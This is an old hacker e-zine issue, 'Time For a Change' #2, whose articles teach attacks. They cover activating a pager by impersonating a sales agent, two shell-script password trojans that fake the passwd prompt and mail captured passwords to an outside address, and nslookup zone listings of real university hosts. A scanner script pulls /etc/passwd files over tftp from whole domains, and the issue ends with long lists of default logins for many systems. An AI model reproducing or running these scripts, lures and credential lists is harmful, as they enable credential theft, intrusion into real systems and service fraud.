your pager (you do have a pager, don't you?), you will need to know a couple of thing about it: it's capcode, and it's frequency. Generally, both of these are printed on the pager itself (on the back, on stickers). The capcode consists of six-digits, but often times letters will be scattered in as well. Discard the letters, keep the numbers, and you have your capcode. The frequency will be in a XXX.XXXX format. Your next step will be to find out which paging company uses the frequency in your pager in your area. A few phone calls will do the trick. Simply call and ask. It may take a while to find someone with enough technical knowledge to answer you, but once you find someone who knows it shouldn't be hard to get the information from them. Simply tell them you have a pager on (xxx.xxxx frequency) and want to know if it can be used on their system. The next step will be to find out which "agents" sell service for the company you have targeted. This is easy, too. In fact, while you are on the phone asking about frequencies, you can ask for a list of authorized agents. The yellow pages will also yield some results. Enough of the easy stuff, on to the hard part. Social engineering skills are essential here. When an agent sells a pager to a customer, they must activate the pager with the paging company. This is done either through a dial-up system, where the agents enters the pager info in the paging companies computer, or over the phone, where the agent calls the paging company, relays the information, and the company enters the information into their computer. To activate your own pager, you will need to assume the identity of an agent, and call the paging company. The conversation should be fairly simple. "Hi, this is KewlHac from ABC Paging, I need to activate a pager." "Sure thing!" "Okay, the capcode is 123456." "Fine. The number for that pager will be 555-6969." "Thanks, have a good day." Done. If ABC paging usually activates its pagers via computer, you might add "Sorry to bother you, but my computer is down...could you help me out?" A trip to ABC Paging, posing as a potential customer should tell you if this is the case. How long will it last? Depends on how sharp ABC Paging is. At worst, 555-6969 should remain valid for at least a month; at best, who knows. Enjoy it while you can. HARDWARE -------- One word: Motorola. This is, of course, a matter of personal preference, but I have found Motorola products to be of the highest quality. Also, since Motorola pagers dominate the market, it is easier to find support for their products. The Motorola family of alpha-pagers includes The Bravo, Bravo Plus, Bravo Express, the Encore, and the Lifestyle Series (essentially Bravos, in redesigned cases). Literature from pager companies will explain the features available in these pagers, as well as pagers from other manufactures, so I won't bother reproducing that here. Most Motorola pagers are programmable via a PC interface (the exception being the Bravo, which requires a dedicated programmer). I have seen some Motorola pager programming software on bbs's, but without cables and a "pager interface box" (essentially, an rs-232 to tty converter), the software is useless. Any decent service center will have the hardware and software required to read and program your pager. Shop around until you find one that is hacker-friendly, or can be social-engineered into carrying out your wishes. Unlike a cellular ESN, a pagers CAPCODE can easily be changed with the programming software. The frequency (in a synthesized pager) can also be changed, within a given range. Other options, such as timestamping (12 or 24 hour), alert-tone volume, etc., are available for alteration via the programming software. ------------------------------------------------------------------------------- ----------------------------------------------------------------------------- Time For a Change presents passwd trojan by Terminal ------------------------------------------------------------------------------ Here I will be presenting two scripts, (more of an idea really)... That you may use to get passwords from people's accounts you are using via rlogin... I am not a super script writer, and that is why I present it as more of an idea, with an example or two... If you get on someones account, you may want to hide this file, for this example we will assume it is named ".hiddenf"... So you could put this in the users home directory, and then add to the users .login an alias for "/bin/passwd/" and "passwd", with "$HOME/.hiddenf" being run instead, so that anytime after that, when they try to change their password, they will really run the script... This script never erases it itself, because then you would never get the NEW password... ---BEGIN SCRIPT ONE--- #!/bin/tcsh echo -n "Changing password for $USER on " hostname echo -n "Old password: " stty -echo echo $<>$HOME/.tym stty echo echo "" mail me@my.anon.mail.service.org<$HOME/.tym rm $HOME/.tym echo echo "Sorry." --END SCRIPT ONE--- Now this next script is a bit different, in that it prompts for both old and new passwords, and then gives an 'error' of "Incorrect Password"... and erases itself... With this you would sort of have to hope the user chooses the same "New Password" the second time it is run.. (The real passwd binary that is)... When 'installing' this you would probably once again want to hide it, and alias "/bin/passwd" and "passwd" to run the hidden file.. ---BEGIN SCRIPT TWO--- #!/bin/tcsh echo -n "Changing password for $USER on ";hostname echo -n "Old password: " stty -echo echo $<>$HOME/.tym echo "" echo -n "New password: " echo $<>>$HOME/.tym echo "" stty echo mail me@my.anon.mail.service.org<$HOME/.tym rm $HOME/.tym echo "Error: Incorrect Password" rm -f $0 unalias /bin/passwd unalias passwd ---END SCRIPT TWO--- Now you may think "Why would the user want to change his/her password anytime soon?".. Well, to get them to change passwords you could send fakemail 'from' their root.. saying that the password file has been tampered with, and that they need to change passwords.. maybe even saying "please use at least one upper case letter, and a number", or something to make it sound real... Or if you could think of any other way to scare the user into changing it, that would also work... I hope this helps someone. ============================================================================ Time For a Change presents nslookup: Utility From The Gods by Panther Modern ------------------------------------------------------------------------------ The nslookup utility is one that at a glance, does not show itself to be largely useful to the hacker populous at large. However, by exploiting this system to it's full extent, nslookup proves invaluable. In TFC Issue One, Article One, Ghost in The Machine pointed out several ways to find new domain names. The nslookup utility will give you a method to find ALL hosts. nslookup also allows one to find real machines within a domain, eliminating hassle when scanning through domains looking for machine names. All in all, the nslookup utility is one of previously undefined wealth and value to those who know how to correctly exploit it's virtues. Section 1: A Bit About nslookup nslookup follows the client-server model, in that your nslookup client will act as a gateway for you to access information contained on the server, which in most cases will be entitled ns.domain.com, domain.com being the root domain. On occasion, domain.com will have several name servers, these usually denoted by ns1.domain.com, ns2.domain.com, etc. Also generally noted will be domain name servers in another domain's hierarchical setup. There are no rules regarding naming of domain name servers. By using a domain's given name service, one is able to determine any information one requires about the given domain's systems, thus enabling one to eliminate previous scanning techniques. Everything which the name server knows, the name server tells. Everything which the name server knows, your client knows. Finally, Everything Which The Name Server Knows, YOU Know. Section 2: Finding New Domains nslookup is invaluable at finding new domains. The first step in doing so is to connect via your nslookup client to one of several major domain name servers located around the net. In this example, I will use the server at ns.internic.net. The following commands should be executed. . . $ nslookup Default Server: ns.domain.com <-- This is the server for your site Address: 127.0.0.1 > server ns.internic.net <-- We will proceed to go to this server Default Server: ns.internic.net Address: 198.41.0.4 Now that we are in our server, we will continue, and find ourselves a listing of every educational name server which our base name server knows about. By getting this list, we can thus determine the names of the domains. This same procedure can also be followed for COM, ORG, as well as country sites, such as IL and PL. For military and government information, it is recommended that server nic.ddn.mil be used. > ls EDU <-- All educational name servers. [ns.internic.net] edu. server = NS.INTERNIC.NET edu. server = AOS.ARL.ARMY.MIL edu. server = NS1.ISI.edu edu. server = C.PSI.NET edu. server = TERP.UMD.edu edu. server = NS.NASA.GOV edu. server = NIC.NORDU.NET edu. server = NS.ISC.ORG edu. server = NS.NIC.DDN.MIL caltech server = DELILAH.CCSF.CALTECH.edu caltech server = SAMPSON.CCSF.CALTECH.edu caltech server = TYBALT.CALTECH.edu TYBALT.CALTECH 131.215.139.100 caltech server = NS1.LBL.GOV caltech server = PUN.CIS.OHIO-STATE.edu caltech server = gap.cco.caltech.edu gap.cco.caltech 131.215.139.43 caltech server = gap-gw.cco.caltech.edu gap-gw.cco.caltech 131.215.139.43 caltech server = hot.CALTECH.edu hot.CALTECH 131.215.9.49 I have cut out all servers that were given to me except for the top- level servers, and the caltech servers, for ease of display. I recommend that when doing a listing such as this, you output it to a file. This is done simply by doing a > ls EDU > EDU This will output to a file called EDU. The top-level servers listed above are those servers which our current name server knows of that can also give similar listings of complete domains. All secondary servers are mainly meant to give listings of their sites. By sorting through our file, EDU, we can now find out new and different .edu sites that we've never heard of before. Section 3: Using Our New Domain Information Let us pretend that I have never heard of domain caltech.edu before. Wow! It's a new domain! I wonder what some of it's systems are? Let's find out. $ nslookup Default Server: ns.domain.com Address: 127.0.0.1 > server hot.caltech.edu Default Server: hot.caltech.edu Address: 131.215.9.49 > ls caltech.edu [hot.caltech.edu] caltech.edu. server = gap.cco.caltech.edu gap.cco 131.215.139.43 caltech.edu. server = gap-gw.cco.caltech.edu gap-gw.cco 131.215.139.43 caltech.edu. server = tybalt.caltech.edu tybalt 131.215.139.100 caltech.edu. 131.215.139.3 caltech.edu. 131.215.51.153 zoo-mac 131.215.44.19 grayver-ppp 131.215.198.103 photon 131.215.156.14 bettys 131.215.139.180 102-Keck-Photo 131.215.9.60 The caltech.edu name server gave us first and foremost a listing of all other caltech.edu name servers. This will probably be useless, but sometimes, if one is patient and bored, one can go through every name server, and find sites not listed in the base name servers. However, I find this to be superfluous, and boring, as stated above. Anyway, we are also given a list of every site at caltech.edu. These sites are real, and we have just eliminated the need for ip-scanning to find sites in a given domain. We have them all, and we are very happy. As a side note, for clarity, I have cut out all but these few sites. The output files for large sites such as these can sometimes be well over 150k worth of site names and ip addresses. Section 5: Using Our Sites For Fun and Profit and Other Stuff Now we have a huge list of sites. One may hack them one by one, or use our big list to find things. For instance, one can grep through our list for "dial" and attempt to find dialouts. Be creative. Look for decservers, or whatever types of systems you specialize in hacking by grepping through lists for their names. Okay, so this isn't as fun as sex, and won't get you any monetary profit. But do it anyway. Section 5a: tftp Scanning Using nslookup Output I originally taught myself use of the nslookup system in order to scan tftp. By using this system, I am able to tftp scan much more quickly, by only hitting real sites. On one run, I was tftp scanning 16 colleges at once for a 10 hour period, and ended up with over 400 password files. Step one: Get nslookup lists of your favorite domains, and output them to files, using the above method. Step two: Cut the first two lines off of your file, using vi, or your favorite editor. Then, execute the following commands. (domain.edu being our assumed file) $ cat domain.edu | grep -v server > domain2.edu This will remove useless lines. $ rm domain.edu $ cat domain2.edu | cut -c1-32 > domain.edu This will leave you with only ip numbers. Step three: Utilize the scanner. I would recommend nohupping it. $ nohup `bandit domain.edu` & Step four: Wait several hours for the scanner to finish (mattering on domain size.), then harvest your many password files. File: bandit ----------------------------Cut Here------------------------------------ #/bin/ksh #TFTP Bandit #By Panther Modern #Usage: nohup `bandit ` & # PDIR="~/pdir" # Define your Password Directory here. function testcomp { tftp $1 << eof verbose timeout 7 trace get /etc/passwd $1 eof } for i in `cat $1` do testcomp $i > /dev/null if [ -s $i ] then cp $i /$PDIR/$i fi rm $i done ----------------------------Cut Here----------------------------------- --- Endnote --- If anyone encounters problems with anything in this file, or finds an error, I would appreciate a report. Such reports can be directed to Ghost in the Machine at his email address, or to Panther Modern on quality boards in the 303 NPA. ------------------------------------------------------------------------------ Time For a Change presents Operating System Identification and default accounts. v0.01 by Taking Your Machine ------------------------------------------------------------------------------ ##### AS/400 - Easily identified by: UserID? Password? Some defaults: UserID Password ------ -------- qsecofr qsecofr / 1111111 / 2222222 qsysopr qpgmr qpgmr ibm password / 2222 / service qsvr qsvr secofr secofr ##### Gandalf XMUX Consoles - (Gandalf) Only known prompt: Password> Gives you 3 tries. VERY Common Passwords: console gandalf system xmux Also found on XMUX's are the Logger and Machine LCN's. Use ports 2 and 3 respectively to reach these. (Note I have only seen these on Datapac, and other X.2X networks.) ##### HP 2000/3000 MPE/xx (Hewlett Packard) Customizable login prompt, but the default is: : EXPECTED HELLO, :JOB, :DATA, OR (CMD) AS LOGON. (CIERR 1402) : hello mgr.telesup ENTER ACCOUNT (TELESUP) PASSWORD: hponly ENTER ACCOUNT (TELESUP) PASSWORD: telesup ENTER ACCOUNT (TELESUP) PASSWORD: remote INCORRECT PASSWORD. (CIERR 1441) From the : prompt type HELLO ., . A fairly long list of defaults follows. USER.ACCOUNT JOBS PASSWORDS --------------- -------- ----------- ADVMAIL.HPOFFICE DATA HP FIELD.HPWORD PUB HPONLY FIELD.HPP187 SYS LOTUS FIELD.SERVICE MANAGER FIELD.SUPPORT MGR MAIL.HPOFFICE MPE MAIL.MAIL REMOTE MAIL.TELESUP TELESUP MANAGER.COGNOS MANAGER.HPOFFICE MANAGER.ITF3000 MANAGER.SECURITY MANAGER.SYS MANAGER.TCH MANAGER.TELESUP MGE.VESOFT MGR.CAROLIAN MGR.CCC MGR.CNAS MGR.CONV MGR.COGNOS MGR.HPDESK MGR.HPWORD MGR.HPOFFICE MGR.HOPNLY MGR.HPP187 MGR.HPP189 MGR.HPP196 MGR.INTX3 MGR.ITF3000 MGR.NETBASE MGR.REGO MGR.RJE MGR.ROBELLE MGR.SECURITY MGR.SYS MGR.TELESUP MGR.VESOFT MGR.WORD MGR.XLSERVER OPERATOR.COGNOS OPERATOR.DISC OPERATOR.SYS OPERATOR.SYSTEM OPERATOR.SUPPORT PCUSER.SYS RSBCMON.SYS SPOOLMAN.HPOFFICE WP.HPOFFICE ##### PrimeOS - VERY Common on X.25/29 networks. Default connect notification: PRIMENET 23.2.0.r26 P6450 Then type LOGIN to get the User id? prompt. User id? SYSTEM Password? SYSTEM Defaults: login password ----- -------- system system / prime mail mail prime prime / primos primos_cs prime / primos primenet primenet mfd mfd tele tele netlink netlink test test guest guest guest1 guest / guest1 ##### System 75 - Login: Password: If you enter an incorrect login name, it will instantly give you: INCORRECT LOGIN Common defaults follow: Login Password ----- -------- bcim bcimpw bciim bciimpw bcms bcmspw / bcms bcnas bcnspw blue bluepw browse looker / browsepw craft crftpw / craftpw / craft cust custpw enquiry enquirypw field support inads indspw / inadspw / inads init initpw kraft kraftpw locate locatepw maint maintpw / rwmaint nms nmspw rcust rcustpw support supportpw tech field ##### UNIX (various flavors, various manufacturers) - UNIX is easily recognized by it's prompts: login: Password: Login incorrect There are infinite combinations of possible login prompt setups, /etc/issue files (which are shown before login), etc.. Nonetheless, UNIX usually identifies itself quite easily. Note: the only "default" most UNIX's come with that is usable is root. However, the following is a list of commonly found accounts. If it is actually a default, it will be noted what flavor of UNIX it is found on. login Password ----- -------- root root sys sys or system or bin sysadm sysadm or admin sysadmin sysadmin or admin bin sys or bin sysbin sysbin daemon daemon lp lp or bin lpadm lpadm lpadmin lpadmin checkfs checkfs checkfsys checkfsys checksys checksys mountfs mountfs mountfsys mountfsys mountsys mountsys umountfs umountfs umountfsys umountfsys umountsys umountsys powerdown powerdown trouble trouble adm adm rje rje unix unix uucp uucp uucpadm uucpadm nuucp nuucp anon anon user user games games install install setup setup demo demo sync sync admin admin guest guest informix informix oracle oracle snake (no password - Linux) satan (no password - Linux) gonzo (no password - Linux) EZsetup (no password - IRIX) demos (no password - IRIX) OutOfBox (no password - IRIX) 4Dgifts (no password - IRIX) tutor (no password - IRIX) ##### VM/CMS (International Business Machines) - Customizable logon screen, but the default is: VM/370 ONLINE--VM/3084--PRESS BREAK KEY TO BEGIN SESSION ! Enter one of the following commands : LOGON userid (Example: LOGON VMUSER1) DIAL userid (Example: DIAL VMUSER2) MSG userid message (Example: MSG VMUSER2 GOOD MORNING) LOGON USERIDS ------- $ALOC$ TEMP TDISK CPNUC DIRECT SAVSYS SYSERR SYSCKP SYSWRM AUTOLOG1 CMSBATCH CMSUSER EREP GCS IVPM1 IVPM2 MAINT OLTSEP OPERATNS OPERATOR SYSDUMP1 TSAFVM VSEMAINT VSEIPO ROUTER AP2SVP APL2PP VMASSYS VMASMON VASTEST BATCH BATCH1 BATCH2 CSPUSER CVIEW DIRMAINT DATAMOVE SFCNTRL FSFTASK1 FSFTASK2 FSFADMIN IIPS ADMIN DISKCNT CPRM OP1 VMUTIL IPFSERV ISPVM NETVIEW PRODBM PROMAIL PROCAL SYSADMIN SFCM1 PSFMAINT PDM470 PDMREMI PVM RSCS RSCSV2 SMART SQLDBA SQLUSER VMARCH VMBACKUP VMBSYSAD DEMO1 DEMO2 DEMO3 DEMO4 VMTAPE VMTLIBR VMMAP VTAM VM3812 VSEMAN PENG MOESERV VTAMUSER CCC IDMSSE IDMS ###### VMS (Digital Equipment Corp.) - Username: Password: User authorization failure USERNAME PASSWORD -------- -------- SYSTEM SYSTEM or MANAGER or OPERATOR or SYSLIB FIELD FIELD or SERVICE or TEST or DIGITAL DEFAULT USER or DEFAULT SYSTEST UETP or SYSTEST SYSMAINT SYSMAINT or SERVICE or DIGITAL VAX VAX VMS VMS DCL DCL DEMO DEMO TEST TEST HELP HELP NEWS NEWS GUEST GUEST GAMES GAMES DECNET DECNET SYS SYS NETCON NETCON ALLIN1 ALLIN1 NETPRIV NETPRIV OPERVAX OPERVAX ALLINONE ALLINONE TELEDEMO TELEDEMO NETSERVER NETSERVER NETNONPRIV NETNONPRIV RJE RJE HOST HOST LINK LINK INFO INFO BACKUP BACKUP NETWORK NETWORK DECMAIL DECMAIL HELPDESK HELPDESK REPORT REPORT MBWATCH MBWATCH MBMANAGER MBMANAGER SYSTEST_CLIG SYSTEST_CLIG UETP UETP USERP USERP STUDENT STUDENT PRIV PRIV POSTMASTER POSTMASTER NEWINGRES NEWINGRES NETMGR NETMGR NETSERVER NETSERVER INGRES INGRES MAILER MAILER DECNET DECNET ALLIN1MAIL ALLIN1MAIL HOST HOST ##### ----------------------------------------------------------------------------- END TIME FOR A CHANGE #2